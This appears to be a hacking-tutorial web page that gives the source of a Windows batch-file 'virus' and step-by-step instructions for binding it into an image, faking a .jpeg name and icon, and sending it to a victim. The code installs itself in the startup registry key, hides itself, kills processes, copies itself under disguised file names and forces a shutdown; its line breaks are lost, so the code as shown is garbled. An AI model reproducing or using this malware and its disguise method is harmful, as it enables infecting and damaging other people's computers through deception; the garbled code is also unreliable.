Computer Virus Definition
A computer virus is a malware program that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be “infected”.Viruses often perform some type of harmful activity on infected hosts, such as stealing hard disk space or CPU time, accessing private information, corrupting data, displaying political or humorous messages on the user’s screen, spamming their contacts, or logging their keystrokes. However, not all viruses carry a destructive payload or attempt to hide themselves—the defining characteristic of viruses is that they are self-replicating computer programs which install themselves without the user’s consent.
Creating a dangerous virus using notepad
1.Copy itself into startup
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
copy this code into notepad and save as Greatgame.bat (while saving select all files instead of text ).
Here is the Code:
@Echo offcolor 4title 4title R.I.Pstartstartstartstart calccopy %0 %Systemroot%Greatgame > nulreg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v Greatgame /t REG_SZ/d %systemroot%Greatgame.bat /f > nulcopy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +hRUNDLL32 USER32.DLL.SwapMouseButtonstart calcclstskill msnmsgrtskill LimeWiretskill iexploretskill NMainstartclscd %userprofile%desktopcopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batcd %userprofile%My Documentscopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batstartstart calcclsmsg * R.I.Pmsg * R.I.Pshutdown -r -t 10 -c “VIRUS DETECTED”startstarttime 12:00:R.I.Pcd %usernameprofile%desktopcopy Greatgame.bat %random%.batgoto RIP
You are done making virus .
Hide virus in image file
1. Easy Binder. (free)
2. Image to Icon Converter. (free)
3. Icon Changer. (free)
Download all the above files and now, you are ready to hide virus in jpeg.
II. Creating an Icon:
For this hack to work, you need an icon of image. Follow the steps below to create an icon:
1. Run Image to Icon Converter from downloaded files.
– Now, click on 128 X 128 checkbox at bottom. Click on Size button and hit on 128 X 128.
2. Adjust image crop, if necessary. Hit on Make. Go to File -> Save and save it on your desktop for later use. Let this icon be “Icon.ico”.
III. Steps to hide virus:
1. Now, run Easy Binder.exe from file downloaded to see:
2. Click “+” button present at bottom pane, browse to your virus file named as Greatgame.bat file and add it. Again using same “+” button, add the image in which you want to hide virus.
3. Now, click on “Settings” present at top to see:
4. Now, click on button next to “Select an Icon” and browse to the “Icon.ico” file created in Step II.
5. Click on button next to “Set Output File” and enter the path where you want to save binded file. Hit on “File’s” tab in upper pane and then click on “Bind files”. Let this final file be “Binded.exe”.
NOTE: Now you got the virus file attached with an image file named “Binded.exe” and it will be detected by Anti virus, so to make it fully undetectable (FUD) you need to follow my previous tutorial: How To Bypass EXE File’s Antivirus Detection Using Metasploit (FUD)
IV. Changing Extension and Icon:
1. After you are done with making your virus file FUD, Open My Computer and go to Tools -> Folder Options. Click on View tab and uncheck “Hide extension for known file types” and hit on OK.
2. Now, rename our “Binded.exe” to say “JessicaAlba.jpeg-JessicaAlba.com”
The format should be:
Imagename.jpeg – Any name.com
I have used JessicaAlba because I am using her image to hide my server.
3. Now, install Icon Changer on your computer obtained from downloaded files. Right click on our binded file and hit on “Change Icon”. Hit on Folder icon next to “Search icons in” as shown:
4. In the dialog box, click on Desktop and hit OK. Now, our Icon.ico will be displayed. Select it and hit on “Set”.
You will see your final virus like this:
Note: Usually, .exe extension creates a doubt in victim’s mind. So, we are using .com extension to fool victim. Usually, people don’t have knowledge of .com extension and out of “JessicaAlba.jpeg-Jessica1.com” they consider “JessicaAlba.jpeg” as image name with .jpeg as image extension. This fools the victim.
That’s it friends. We are successful to hide virus in a jpeg image. Now, send this binded image file to your victim and whenever he will run the image on his computer, your sent hidden virus will be installed on victim computer without his knowledge.
NOTE:- This virus is very very dangerous , it can crash your system completely.Please do not harm anyone using this virus. This is only for education purposes.